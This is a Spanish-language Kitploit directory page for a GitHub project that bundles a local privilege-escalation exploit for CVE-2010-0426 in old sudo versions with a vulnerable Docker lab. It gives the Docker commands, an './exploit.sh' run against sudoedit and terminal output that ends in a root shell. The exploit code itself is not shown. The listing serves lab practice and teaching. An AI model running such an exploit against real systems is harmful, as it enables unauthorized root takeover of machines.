Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
privesc-CVE-2010-0426 — Sudo 1.6.x <= 1.6.9p21 y 1.7.x <= 1.7.2p4 Escalada de privilegios local y contenedor vulnerable. | Kitploit
Herramientas/GitHubGitHub/t0kx/privesc-cve-2010-0426
Escalada de PrivilegiosSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubt0kx/privesc-cve-2010-0426

privesc-CVE-2010-0426

Sudo 1.6.x <= 1.6.9p21 y 1.7.x <= 1.7.2p4 Escalada de privilegios local y contenedor vulnerable.

Ver Repositorio
11134hace 8 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Sudo 1.6.x<=1.6.9p21 y 1.7.x<=1.7.2p4 Escalada de Privilegios Local

Sudo (su "do") permite a un administrador del sistema otorgar a ciertos usuarios (o grupos de usuarios) la capacidad de ejecutar algunos (o todos) los comandos como root mientras registra todos los comandos y argumentos.

Entorno vulnerable

Para preparar un entorno vulnerable para tu prueba necesitarás tener Docker instalado y simplemente ejecutar el siguiente comando:

root@kitploit:~
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426

Y generará un shell interactivo con privilegios bajos de usuario.

Código vulnerable

El error se encontró en sudoedit, que no maneja el comando 'sudoedit' correctamente. Esto permite a un usuario malintencionado reemplazar el comando sudoedit real por un comando arbitrario.

Los atacantes locales podrían explotar este problema para ejecutar comandos arbitrarios como el usuario 'root'. Las explotaciones exitosas pueden comprometer por completo un equipo afectado.

Exploit

Para explotar este objetivo solo ejecuta:

root@kitploit:~
./exploit.sh

Si estás usando esta imagen vulnerable, puedes simplemente ejecutar:

root@kitploit:~
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
	(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#

Créditos

Esta falla fue encontrada por Slouching.

Descargo de responsabilidad

Este programa o los anteriores son ÚNICAMENTE para fines educativos. No lo uses sin permiso. Se aplica el descargo de responsabilidad habitual, especialmente el hecho de que yo (t0kx) no sea responsable de ningún daño causado por el uso directo o indirecto de la información o la funcionalidad proporcionada por estos programas. El autor o cualquier proveedor de Internet NO asume responsabilidad alguna por el contenido o el uso indebido de estos programas o de cualquier derivado de los mismos. Al usar estos programas aceptas el hecho de que cualquier daño (pérdida de datos, caída del sistema, compromiso del sistema, etc.) causado por el uso de estos programas no es responsabilidad de t0kx.

Descargar herramienta